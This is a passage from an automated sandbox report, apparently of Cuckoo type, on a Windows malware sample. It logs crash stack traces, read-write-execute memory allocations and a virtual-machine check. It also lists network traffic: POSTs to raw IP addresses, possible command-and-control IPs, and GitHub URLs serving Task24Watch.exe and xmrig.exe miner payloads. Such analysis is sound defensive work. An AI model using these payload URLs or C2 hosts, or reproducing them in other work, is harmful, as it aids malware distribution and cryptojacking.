8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5bc819 registers.esp: 3993368 registers.edi: 40598580 registers.eax: 0 registers.ebp: 3993392 registers.edx: 7299248 registers.ebx: 1175258073 registers.esi: 40599380 registers.ecx: 0	1
__exception__ Aug. 13, 2022, 8:14 p.m.	stacktrace: 0x625702 0x62567d 0x62164c 0x6213a0 0x620056 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fc4264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fc42e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fcf74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fcf7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fd81dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fd81e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fd81f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fd8416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x702ff5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x70377f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x70374de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x625791 registers.esp: 1372188 registers.edi: 37459964 registers.eax: 0 registers.ebp: 1372212 registers.edx: 5202008 registers.ebx: 36347224 registers.esi: 37460144 registers.ecx: 0	1
__exception__ Aug. 13, 2022, 8:14 p.m.	stacktrace: 0x572552 0x5724cd 0x57190c 0x571660 0x570056 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fc4264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fc42e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fcf74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fcf7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fd81dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fd81e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fd81f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fd8416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x702ff5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x70377f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x70374de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5725e1 registers.esp: 4123916 registers.edi: 39355660 registers.eax: 0 registers.ebp: 4123940 registers.edx: 6904904 registers.ebx: 38254064 registers.esi: 39355840 registers.ecx: 0	1
__exception__ Aug. 13, 2022, 8:14 p.m.	stacktrace: rawxdev+0x1101d @ 0xa3101d rawxdev+0x10e77 @ 0xa30e77 rawxdev+0x10d0d @ 0xa30d0d rawxdev+0x11098 @ 0xa31098 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: c7 45 fc fe ff ff ff e9 c0 00 00 00 b8 01 00 00 exception.symbol: rawxdev+0xcec7 exception.instruction: mov dword ptr [ebp + 0xfffffffc], 0xfffffffe exception.module: rawxdev.exe exception.exception_code: 0x80000004 exception.offset: 52935 exception.address: 0xa2cec7 registers.esp: 4257968 registers.edi: 4258300 registers.eax: 1 registers.ebp: 4258324 registers.edx: 2130566132 registers.ebx: 2130567168 registers.esi: 4257968 registers.ecx: 2412658573	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (11 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.159.248.173/1571
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.159.248.173/3137953174.zip
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://193.56.146.177/
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://45.159.248.173/
suspicious_features	GET method with no useragent header	suspicious_request	GET https://dl.uploadgram.me/62f0d0bc546feh?raw
suspicious_features	GET method with no useragent header	suspicious_request	GET https://github.com/BardBax/xyi/blob/main/Task24Watch.exe?raw=true
suspicious_features	GET method with no useragent header	suspicious_request	GET https://github.com/BardBax/xyi/raw/main/Task24Watch.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://raw.githubusercontent.com/BardBax/xyi/main/Task24Watch.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://github.com/BardBax/xyi/blob/main/xmrig.exe?raw=true
suspicious_features	GET method with no useragent header	suspicious_request	GET https://github.com/BardBax/xyi/raw/main/xmrig.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://raw.githubusercontent.com/BardBax/xyi/main/xmrig.exe

Performs some HTTP requests (13 events)

request	GET http://45.159.248.173/1571
request	GET http://45.159.248.173/3137953174.zip
request	POST http://193.56.146.177/
request	POST http://45.159.248.173/
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://dl.uploadgram.me/62f0d0bc546feh?raw
request	GET https://github.com/BardBax/xyi/blob/main/Task24Watch.exe?raw=true
request	GET https://github.com/BardBax/xyi/raw/main/Task24Watch.exe
request	GET https://raw.githubusercontent.com/BardBax/xyi/main/Task24Watch.exe
request	GET https://github.com/BardBax/xyi/blob/main/xmrig.exe?raw=true
request	GET https://github.com/BardBax/xyi/raw/main/xmrig.exe
request	GET https://raw.githubusercontent.com/BardBax/xyi/main/xmrig.exe

Sends data using the HTTP POST Method (2 events)

request	POST http://193.56.146.177/
request	POST http://45.159.248.173/

Communication to multiple IPs on high port numbers possibly indicative of a peer-to-peer (P2P) or non-standard command and control protocol (5 events)

ip	103.89.90.61
ip	176.113.115.146
ip	185.191.229.101
ip	195.54.170.157
ip	51.15.55.100

Allocates read-write-execute memory (usually to unpack itself) (50 out of 979 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 region_size: 13570048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03890000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755ef000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755ef000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755ef000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755ef000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755bc000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755dc000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755bc000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755dc000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74123000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x741c7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74d49000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x753e2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755a2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755ef000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755ef000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755ef000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2480 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03170000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:14 p.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73dc1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 region_size: 528384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02fa0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03020000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755ef000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755ef000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755ef000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755ef000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755bc000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755dc000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755bc000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755dc000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74123000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x741c7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74d49000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x753e2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755a2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755a7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755bf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755a6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76873000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7730d000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76877000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75598000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7559d000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x772f2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x772e2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75276000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74ce4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74ce3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74ce5000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74ce3000 process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Aug. 13, 2022, 8:08 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 10219769856 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1	0

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 2480 crashed
__exception__ Aug. 13, 2022, 8:14 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74de374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x752d4387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74ddef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74dd6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74dd6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74dd6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74df5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74e706b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x753ad7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x753ad876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x753addd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x752c8a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x752c8938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x752c950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x753adccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x753adb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x753ae1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x752c9367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x752c9326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755962fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75596d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755977c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7559788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x7528a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x7528853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x7528a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x7529cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x7529d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x766fb727 registers.esp: 131331100 registers.edi: 6821756 registers.eax: 131331100 registers.ebp: 131331180 registers.edx: 523248241 registers.ebx: 131331464 registers.esi: 2147746133 registers.ecx: 91117656	1	0	0
__exception__ Aug. 13, 2022, 8:14 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74de374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x753af725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74df414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x7527fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x753aa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7678e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x767672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7675ab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x7675ea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x767587f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x7675ba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755962fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75596d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755977c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75597bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7678516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x767850ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7675a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76759b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76759aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7678530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x767857a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x7266540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x726652ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72740ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77317e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x772f54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x766fb727 